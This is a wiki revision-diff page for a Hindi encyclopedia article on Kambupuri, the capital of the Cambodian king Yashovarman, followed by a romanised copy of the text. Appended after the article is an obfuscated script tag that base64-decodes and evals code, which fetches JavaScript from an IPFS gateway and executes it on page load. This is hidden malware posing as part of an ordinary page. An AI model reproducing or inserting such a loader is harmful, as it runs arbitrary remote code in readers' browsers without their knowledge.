Difference between revisions of "कंबुपुरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
*[[कंबुज]] या कंबोडिया (दक्षिण-पूर्व [[एशिया]]) की एक नगरी जो 889 ई. में अभिषिक्त [[हिन्दू]] राजा यशोवर्मन की राजधानी थी।  
+
[[कंबुज]] या कंबोडिया (दक्षिण-पूर्व [[एशिया]]) की एक नगरी जो 889 ई. में अभिषिक्त [[हिन्दू]] राजा यशोवर्मन की राजधानी थी।  
 
*यशोवर्मन ने इस नगरी का नाम बदलकर [[यशोधरपुर]] कर दिया था।  
 
*यशोवर्मन ने इस नगरी का नाम बदलकर [[यशोधरपुर]] कर दिया था।  
 
*नगरी के निकट यशोधरगिरि-वर्तमान फनोमबाखेन- के शिखर पर राज प्रासाद बनवाया गया था।  
 
*नगरी के निकट यशोधरगिरि-वर्तमान फनोमबाखेन- के शिखर पर राज प्रासाद बनवाया गया था।  
 
*यह नगरी अंगकोर सभ्यता के पूरे उत्कर्ष काल में कंबुज देश की राजधानी बनी रही।  
 
*यह नगरी अंगकोर सभ्यता के पूरे उत्कर्ष काल में कंबुज देश की राजधानी बनी रही।  
  
{{प्रचार}}
+
 
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{विदेशी स्थान}}
 +
[[Category:विदेशी स्थान]]
 
[[Category:प्राचीन भारत का इतिहास]]
 
[[Category:प्राचीन भारत का इतिहास]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
  
 
__INDEX__
 
__INDEX__

Revision as of 08:19, 26 March 2012

kanbuj ya kanbodiya (dakshin-poorv eshiya) ki ek nagari jo 889 ee. mean abhishikt hindoo raja yashovarman ki rajadhani thi.

  • yashovarman ne is nagari ka nam badalakar yashodharapur kar diya tha.
  • nagari ke nikat yashodharagiri-vartaman phanomabakhen- ke shikhar par raj prasad banavaya gaya tha.
  • yah nagari aangakor sabhyata ke poore utkarsh kal mean kanbuj desh ki rajadhani bani rahi.


tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>